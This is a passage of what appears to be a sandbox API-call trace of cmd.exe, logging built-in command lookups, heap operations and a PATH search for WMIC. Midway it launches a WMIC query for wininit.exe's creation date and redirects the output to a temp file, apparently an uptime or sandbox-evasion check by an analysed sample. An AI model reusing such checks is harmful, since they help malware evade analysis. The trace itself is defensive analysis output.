[0561.697] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12
[0561.698] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10
[0561.698] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7
[0561.698] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7
[0561.698] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22
[0561.698] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17
[0561.698] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21
[0561.698] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20
[0561.698] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10
[0561.698] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17
[0561.698] _wcsicmp (_String1="WMIC", _String2="IF") returned 14
[0561.698] _wcsicmp (_String1="WMIC", _String2="REM") returned 5
[0561.698] GetProcessHeap () returned 0x420000
[0561.698] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x4010) returned 0x43b010
[0561.698] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19
[0561.698] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18
[0561.698] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19
[0561.698] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3
[0561.699] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20
[0561.699] _wcsicmp (_String1="WMIC", _String2="CD") returned 20
[0561.699] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20
[0561.699] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5
[0561.699] _wcsicmp (_String1="WMIC", _String2="REN") returned 5
[0561.699] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18
[0561.699] _wcsicmp (_String1="WMIC", _String2="SET") returned 4
[0561.699] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7
[0561.699] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19
[0561.699] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3
[0561.699] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7
[0561.699] _wcsicmp (_String1="WMIC", _String2="MD") returned 10
[0561.699] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10
[0561.699] _wcsicmp (_String1="WMIC", _String2="RD") returned 5
[0561.699] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5
[0561.699] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7
[0561.699] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16
[0561.699] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4
[0561.699] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20
[0561.699] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20
[0561.699] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1
[0561.699] _wcsicmp (_String1="WMIC", _String2="VER") returned 1
[0561.699] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1
[0561.699] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18
[0561.700] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4
[0561.700] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18
[0561.700] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3
[0561.700] _wcsicmp (_String1="WMIC", _String2="START") returned 4
[0561.700] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19
[0561.700] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12
[0561.700] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10
[0561.700] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7
[0561.700] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7
[0561.700] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22
[0561.700] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17
[0561.700] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21
[0561.700] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20
[0561.700] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10
[0561.700] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20
[0561.701] GetProcessHeap () returned 0x420000
[0561.701] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x420) returned 0x43f030
[0561.701] SetErrorMode (uMode=0x0) returned 0x0
[0561.701] SetErrorMode (uMode=0x1) returned 0x0
[0561.701] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x43f040, lpFilePart=0x2ef490 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2ef490*="system32") returned 0x13
[0561.701] SetErrorMode (uMode=0x0) returned 0x1
[0561.701] GetProcessHeap () returned 0x420000
[0561.701] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x43f030, Size=0x42) returned 0x43f030
[0561.701] GetProcessHeap () returned 0x420000
[0561.701] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x43f030) returned 0x42
[0561.702] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a07f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0561.702] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0561.702] GetProcessHeap () returned 0x420000
[0561.702] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x1ce) returned 0x43a210
[0561.702] GetProcessHeap () returned 0x420000
[0561.702] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x38c) returned 0x43f090
[0561.711] GetProcessHeap () returned 0x420000
[0561.711] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x43f090, Size=0x1d0) returned 0x43f090
[0561.711] GetProcessHeap () returned 0x420000
[0561.711] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x43f090) returned 0x1d0
[0561.711] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a07f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0561.711] GetProcessHeap () returned 0x420000
[0561.711] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xe8) returned 0x43f270
[0561.711] GetProcessHeap () returned 0x420000
[0561.711] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x43f270, Size=0x7e) returned 0x43f270
[0561.711] GetProcessHeap () returned 0x420000
[0561.711] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x43f270) returned 0x7e
[0561.713] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.713] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*" (normalized: "c:\\windows\\system32\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0xffffffffffffffff
[0561.713] GetLastError () returned 0x2
[0561.713] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC" (normalized: "c:\\windows\\system32\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0xffffffffffffffff
[0561.714] GetLastError () returned 0x2
[0561.714] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.714] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\WMIC.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0xffffffffffffffff
[0561.717] GetLastError () returned 0x2
[0561.717] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\WMIC" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0xffffffffffffffff
[0561.717] GetLastError () returned 0x2
[0561.717] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.717] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*" (normalized: "c:\\windows\\system32\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0xffffffffffffffff
[0561.718] GetLastError () returned 0x2
[0561.718] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC" (normalized: "c:\\windows\\system32\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0xffffffffffffffff
[0561.718] GetLastError () returned 0x2
[0561.718] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.718] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*" (normalized: "c:\\windows\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0xffffffffffffffff
[0561.718] GetLastError () returned 0x2
[0561.718] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC" (normalized: "c:\\windows\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0xffffffffffffffff
[0561.719] GetLastError () returned 0x2
[0561.719] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.719] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*" (normalized: "c:\\windows\\system32\\wbem\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0x43a3f0
[0561.719] GetProcessHeap () returned 0x420000
[0561.719] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x28) returned 0x4347e0
[0561.719] FindClose (in: hFindFile=0x43a3f0 | out: hFindFile=0x43a3f0) returned 1
[0561.719] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM" (normalized: "c:\\windows\\system32\\wbem\\wmic.com"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0xffffffffffffffff
[0561.720] GetLastError () returned 0x2
[0561.720] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0x43a3f0
[0561.720] GetProcessHeap () returned 0x420000
[0561.720] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x4347e0, Size=0x8) returned 0x43a450
[0561.720] FindClose (in: hFindFile=0x43a3f0 | out: hFindFile=0x43a3f0) returned 1
[0561.720] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0561.720] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0561.720] GetProcessHeap () returned 0x420000
[0561.720] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x28) returned 0x4347e0
[0561.720] GetProcessHeap () returned 0x420000
[0561.720] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x218) returned 0x43f300
[0561.720] GetProcessHeap () returned 0x420000
[0561.720] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x82) returned 0x43f520
[0561.720] SetErrorMode (uMode=0x0) returned 0x0
[0561.721] SetErrorMode (uMode=0x1) returned 0x0
[0561.721] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x43f5c0, lpFilePart=0x2ef220 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2ef220*="system32") returned 0x13
[0561.721] SetErrorMode (uMode=0x0) returned 0x1
[0561.721] GetProcessHeap () returned 0x420000
[0561.721] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x43f5b0, Size=0x42) returned 0x43f5b0
[0561.721] GetProcessHeap () returned 0x420000
[0561.721] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x43f5b0) returned 0x42
[0561.721] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a07f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0561.721] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0561.721] GetProcessHeap () returned 0x420000
[0561.721] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x1ce) returned 0x43f610
[0561.721] GetProcessHeap () returned 0x420000
[0561.721] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x38c) returned 0x43f7f0
[0561.721] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x43f7f0, Size=0x1d0) returned 0x43f7f0
[0561.721] GetProcessHeap () returned 0x420000
[0561.721] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x43f7f0) returned 0x1d0
[0561.722] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a07f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0561.722] GetProcessHeap () returned 0x420000
[0561.722] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xe8) returned 0x43f9d0
[0561.722] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x43f9d0, Size=0x7e) returned 0x43f9d0
[0561.722] GetProcessHeap () returned 0x420000
[0561.722] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x43f9d0) returned 0x7e
[0561.722] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.722] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*" (normalized: "c:\\windows\\system32\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0xffffffffffffffff
[0561.722] GetLastError () returned 0x2
[0561.722] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC" (normalized: "c:\\windows\\system32\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0xffffffffffffffff
[0561.722] GetLastError () returned 0x2
[0561.723] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.723] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\WMIC.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0xffffffffffffffff
[0561.723] GetLastError () returned 0x2
[0561.723] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\WMIC" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0xffffffffffffffff
[0561.723] GetLastError () returned 0x2
[0561.723] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.723] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*" (normalized: "c:\\windows\\system32\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0xffffffffffffffff
[0561.724] GetLastError () returned 0x2
[0561.724] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC" (normalized: "c:\\windows\\system32\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0xffffffffffffffff
[0561.724] GetLastError () returned 0x2
[0561.724] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.724] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*" (normalized: "c:\\windows\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0xffffffffffffffff
[0561.724] GetLastError () returned 0x2
[0561.724] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC" (normalized: "c:\\windows\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0xffffffffffffffff
[0561.724] GetLastError () returned 0x2
[0561.725] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.725] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*" (normalized: "c:\\windows\\system32\\wbem\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0x43a3f0
[0561.725] FindClose (in: hFindFile=0x43a3f0 | out: hFindFile=0x43a3f0) returned 1
[0561.725] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM" (normalized: "c:\\windows\\system32\\wbem\\wmic.com"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0xffffffffffffffff
[0561.725] GetLastError () returned 0x2
[0561.725] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0x43a3f0
[0561.725] FindClose (in: hFindFile=0x43a3f0 | out: hFindFile=0x43a3f0) returned 1
[0561.726] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0561.726] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0561.726] GetConsoleTitleW (in: lpConsoleTitle=0x2ef4e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0561.726] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef298, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef258 | out: lpAttributeList=0x2ef298, lpSize=0x2ef258) returned 1
[0561.726] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef298, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef248, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef298, lpPreviousValue=0x0) returned 1
[0561.726] GetStartupInfoW (in: lpStartupInfo=0x2ef3b0 | out: lpStartupInfo=0x2ef3b0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0561.726] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1
[0561.729] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC PROCESS where name=\"wininit.exe\" get creationdate ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x2ef2d0*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="WMIC PROCESS where name=\"wininit.exe\" get creationdate ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef280 | out: lpCommandLine="WMIC PROCESS where name=\"wininit.exe\" get creationdate ", lpProcessInformation=0x2ef280*(hProcess=0x64, hThread=0x5c, dwProcessId=0x520, dwThreadId=0x440)) returned 1
[0561.748] CloseHandle (hObject=0x5c) returned 1
[0561.748] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0561.748] GetProcessHeap () returned 0x420000
[0561.748] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x438fb0 | out: hHeap=0x420000) returned 1
[0561.748] GetEnvironmentStringsW () returned 0x438fb0*
[0561.748] GetProcessHeap () returned 0x420000
[0561.748] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xb78) returned 0x43fe40
[0561.748] memcpy (in: _Dst=0x43fe40, _Src=0x438fb0, _Size=0xb78 | out: _Dst=0x43fe40) returned 0x43fe40
[0561.748] FreeEnvironmentStringsW (penv=0x438fb0) returned 1
[0561.748] GetProcessHeap () returned 0x420000
[0561.748] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x43a470 | out: hHeap=0x420000) returned 1
[0561.748] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef298 | out: lpAttributeList=0x2ef298)
[0561.748] _get_osfhandle (_FileHandle=3) returned 0x58
[0561.748] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x58, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1
[0561.748] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0
[0561.749] _close (_FileHandle=5) returned 0
[0561.750] _dup (_FileHandle=0) returned 4
[0561.750] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0
[0561.751] _close (_FileHandle=3) returned 0
[0561.752] SetErrorMode (uMode=0x0) returned 0x0
[0561.752] SetErrorMode (uMode=0x1) returned 0x0
[0561.752] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x438fc0, lpFilePart=0x2ef490 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2ef490*="system32") returned 0x13
[0561.752] SetErrorMode (uMode=0x0) returned 0x1
[0561.752] GetProcessHeap () returned 0x420000
[0561.752] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x438fb0, Size=0x42) returned 0x438fb0
[0561.752] GetProcessHeap () returned 0x420000
[0561.752] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x438fb0) returned 0x42
[0561.752] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a07f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0561.752] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0561.752] GetProcessHeap () returned 0x420000
[0561.753] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x1ce) returned 0x435ea0
[0561.753] GetProcessHeap () returned 0x420000
[0561.753] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x38c) returned 0x439010
[0561.753] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x439010, Size=0x1d0) returned 0x439010
[0561.753] GetProcessHeap () returned 0x420000
[0561.753] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x439010) returned 0x1d0
[0561.753] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a07f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0561.753] GetProcessHeap () returned 0x420000
[0561.753] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xe8) returned 0x4391f0
[0561.753] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x4391f0, Size=0x7e) returned 0x4391f0
[0561.753] GetProcessHeap () returned 0x420000
[0561.753] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4391f0) returned 0x7e
[0561.753] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.753] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\more.*" (normalized: "c:\\windows\\system32\\more.*"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0x436080
[0561.753] FindClose (in: hFindFile=0x436080 | out: hFindFile=0x436080) returned 1
[0561.754] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\more.COM" (normalized: "c:\\windows\\system32\\more.com"), fInfoLevelId=0x1, lpFindFileData=0x2ef200, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef200) returned 0x436080
[0561.754] FindClose (in: hFindFile=0x436080 | out: hFindFile=0x436080) returned 1
[0561.754] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1
[0561.754] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2
[0561.754] _get_osfhandle (_FileHandle=1) returned 0x7
[0561.754] _get_osfhandle (_FileHandle=1) returned 0x7
[0561.754] _get_osfhandle (_FileHandle=1) returned 0x7
[0561.754] GetFileType (hFile=0x7) returned 0x2
[0561.756] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0561.756] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef4a8 | out: lpMode=0x2ef4a8) returned 1
[0561.756] _dup (_FileHandle=1) returned 3
[0561.757] _close (_FileHandle=1) returned 0
[0561.758] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", _String2="con") returned -53
[0561.758] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2ef458, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58
[0561.813] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 1
[0561.813] GetProcessHeap () returned 0x420000
[0561.813] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x218) returned 0x439280
[0561.813] GetProcessHeap () returned 0x420000
[0561.814] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x1e) returned 0x434870
[0561.814] SetErrorMode (uMode=0x0) returned 0x0
[0561.814] SetErrorMode (uMode=0x1) returned 0x0
[0561.814] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4394b0, lpFilePart=0x2ef220 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2ef220*="system32") returned 0x13
[0561.814] SetErrorMode (uMode=0x0) returned 0x1
[0561.814] GetProcessHeap () returned 0x420000
[0561.814] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x4394a0, Size=0x42) returned 0x4394a0
[0561.814] GetProcessHeap () returned 0x420000
[0561.814] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4394a0) returned 0x42
[0561.814] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a07f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0561.814] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0561.814] GetProcessHeap () returned 0x420000
[0561.815] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x1ce) returned 0x439500
[0561.815] GetProcessHeap () returned 0x420000
[0561.815] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x38c) returned 0x4396e0
[0561.815] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x4396e0, Size=0x1d0) returned 0x4396e0
[0561.815] GetProcessHeap () returned 0x420000
[0561.815] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4396e0) returned 0x1d0
[0561.815] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a07f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0561.815] GetProcessHeap () returned 0x420000
[0561.815] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xe8) returned 0x4398c0
[0561.815] RtlReAllocateHeap (Heap=0x420000, Flags=0x0, Ptr=0x4398c0, Size=0x7e) returned 0x4398c0
[0561.815] GetProcessHeap () returned 0x420000
